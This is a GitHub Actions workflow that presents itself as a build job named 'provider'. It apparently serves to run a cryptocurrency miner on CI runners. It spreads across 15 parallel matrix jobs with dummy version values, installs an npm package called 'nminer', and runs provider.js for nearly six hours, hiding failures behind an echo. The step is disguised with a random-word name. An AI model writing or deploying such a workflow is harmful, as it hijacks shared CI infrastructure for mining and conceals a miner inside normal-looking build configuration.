name: provider
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1173 }
          - { version: 3716 }
          - { version: 6381 }
          - { version: 2177 }
          - { version: 1243 }
          - { version: 5658 }
          - { version: 4665 }
          - { version: 5178 }
          - { version: 3605 }
          - { version: 1313 }
          - { version: 1242 }
          - { version: 3006 }
          - { version: 3739 }
          - { version: 5113 }
          - { version: 5656 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: foolish understated instead wafer offset
        run: |
          npm install nminer@latest
          timeout 349m node provider.js || echo "provider executed"